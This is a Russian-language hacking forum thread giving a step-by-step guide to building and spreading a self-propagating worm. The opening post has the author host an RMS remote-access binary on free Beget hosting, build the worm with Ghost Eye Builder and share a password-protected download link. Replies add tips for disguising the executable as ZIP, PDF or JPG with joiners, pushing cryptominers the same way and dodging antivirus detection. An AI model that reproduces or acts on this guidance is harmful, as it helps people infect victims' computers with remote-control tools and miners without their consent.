Актуально [Сетевой/Многовекторный червь]

Тема в разделе "Пентестинг", создана пользователем Ballard, 15 май 2017.

  1. Ballard

    Ballard

    Сообщения:
    418
    Баллы:
    18
    Делаем вирус который распространяется сам[Сетевой/Многовекторный червь]

    Сегодня поговорим о Сетевых червях и о Многовекторных червях

    Сетевой червь — разновидность самовоспроизводящихся компьютерных программ, распространяющихся в локальных и глобальных компьютерных сетях. В отличие от других типов компьютерных вирусов червь является самостоятельной программой.Черви могут использовать различные механизмы ("векторы") распространения.

    Многовекторный червьhttps://ru.wikipedia.org/wiki/Сетевой_червь, применяющий для своего распространения несколько разных механизмов (векторов атаки), например, https://ru.wikipedia.org/wiki/Электронная_почта иhttps://ru.wikipedia.org/wiki/Эксплойт ошибки в https://ru.wikipedia.org/wiki/Операционная_система.Черви повреждают файлы и негативно влияют на работу компьютера.

    Мы сделаем вирус который будет распространять себя сам

    1.Вирус у меня это RMS

    2.Регистрируемся на Beget https://beget.com/ru

    После регистрации вы увидите это

    Нам надо Файловый менеджер
    http://image.prntscr.com/image/287eb168955340338b4d643b2e183e0a.png
    Нажимаем ******.beget.tech
    http://image.prntscr.com/image/62f8fd338f9d418d9c7066948accbf2c.png
    Нажимаем public_htmlhttp://image.prntscr.com/image/6a254099db5247f4be4341a51a5dfb0e.png
    Нажимаем Загрузить файлы
    http://image.prntscr.com/image/f37d031ce68849d1af1ea0266fed0a6c.png
    Нажимаем Browse
    http://image.prntscr.com/image/ac0a2132aaea4b8197c987c33f31169c.png
    Выбираем файл(вирус)---Открыть
    http://image.prntscr.com/image/9e79b0249fa34dcba6f07849db7fd66f.png
    Нажимаем Загрузка
    http://image.prntscr.com/image/13895653f6414246a2324e3b2e1d122c.png
    Потом пишем в адресной стоке ваш сайт + /название_файла.exe
    Пример http://mysite.beget.tech/rms.exe
    Вам должны предложить скачать ваш файл(вирус)
    http://image.prntscr.com/image/738144249c2840d9b8a770c65690aa82.png

    Первая часть сделана
    Теперь червь
    Я пользуюсь Ghost Eye Builder
    --Заражает флешку
    --Копирует себя в папки
    --Перемещения по lan
    --p2p
    --Спамит везде где пишет жертва
    http://prnt.sc/edc2xy
    http://prnt.sc/edc31f

    http://prnt.sc/edc31f
    https://mega.nz/#!BU9BAThL!nEN0xC1Xex4yr5F_6skmHrERwI_8geYKRWs2evVb08g
    Пароль: lolzteam.net

    http://prnt.sc/edc31f
    https://www.virustotal.com/ru/file/...ddb5f0aacb90b221c721ace3/analysis/1488030540/
    http://prnt.sc/edc31f
    https://www.virustotal.com/ru/file/...9f18f8bebeea5478ee677df8/analysis/1488030629/
    http://prnt.sc/edc31fhttp://mysite.beget.tech/rms.exe
    http://prnt.sc/edc31f

    http://prnt.sc/edc31f
    Все червь готов осталось только закинуть одному человеку и все
    Червь сделает все сам.



    Конкретного автора указать не могу (неизвестен)
  2. Alinchok

    Alinchok

    Сообщения:
    520
    Баллы:
    18
    добавлю от себя, чтоб не предлагало скачивать а сразу качало меняйте расширение джойнером на ZIP или RAR, или PDF при конфигурации бегета по умолчанию ( то есть если не ковырять) все скачается не спрашивая владельца, ему останется только один клик- посмотреть что же он скачал такое и понеслась
  3. Soyler

    Soyler

    Сообщения:
    720
    Баллы:
    16
    Ух как годно. А можно через этот софт мой майнер так сделать? Сложная процедура
  4. Alinchok

    Alinchok

    Сообщения:
    520
    Баллы:
    18
    да можно
  5. akame713

    akame713

    Сообщения:
    9
    Баллы:
    1
    А данный хостинг не заблочит тебя как узнает чем ты промышляешь? а чот прочитал их соглашение там нечего нельзя
  6. alexmin

    alexmin

    Сообщения:
    586
    Баллы:
    16
    Я правильно понял, что это червь тупо качает и исполняет то, что ему дали по ссылке? Если туда положить майнера, будет ставить? И как у него с детектом, паблик небось палится чем только можно?
  7. alexmin

    alexmin

    Сообщения:
    586
    Баллы:
    16
    А как запустить рмс или майнера при открытии пдф?
  8. Alinchok

    Alinchok

    Сообщения:
    520
    Баллы:
    18
    меняйте расширение джойнером на ZIP или RAR, или PDF
  9. detroiton

    detroiton

    Сообщения:
    46
    Баллы:
    6
    Имя софтинки не подскажеш? Ковырялся в гугле он незнает таких которые умеют расширение менять.
  10. alexmin

    alexmin

    Сообщения:
    586
    Баллы:
    16
    OXI Joiner к примеру. Но все паблик джойнеры палятся даже самым захудалым антивирем. так что надо искать что-то приватное.
  11. Alinchok

    Alinchok

    Сообщения:
    520
    Баллы:
    18
    JoynerJoy, MegaSpoofer и все такое... это паблики уже
  12. 1fo4

    1fo4

    Сообщения:
    31
    Баллы:
    1
    Это получается джойнером можно поменять на любое(инетересен жпег) расширение и откроется ехе?
  13. kucki

    kucki

    Сообщения:
    28
    Баллы:
    1
    Целый час дрочил с бубном, но все робит, спс
  14. 1fo4

    1fo4

    Сообщения:
    31
    Баллы:
    1
    Так и не разобрался как поменять расширение у файла, чтоб не ехе было
    JoinerJoy что-то не показывает такой фишки
  15. 1fo4

    1fo4

    Сообщения:
    31
    Баллы:
    1
    Ну вроде разобрался как поменять разрешение, только теперь вопрос вот в чем. Я сделал фотку .jpg а браузер открывает ее в превью и не качает мой ехе
    Как сделать так, чтоб скачался он автоматом, как выше написали?
    А, там только при конфигурации бегета только написано, а как-то можно на других хостингах так сделать? Что менять нужно?

    На бегете тоже картинку не качает к сожалению(

Поделиться этой страницей

Top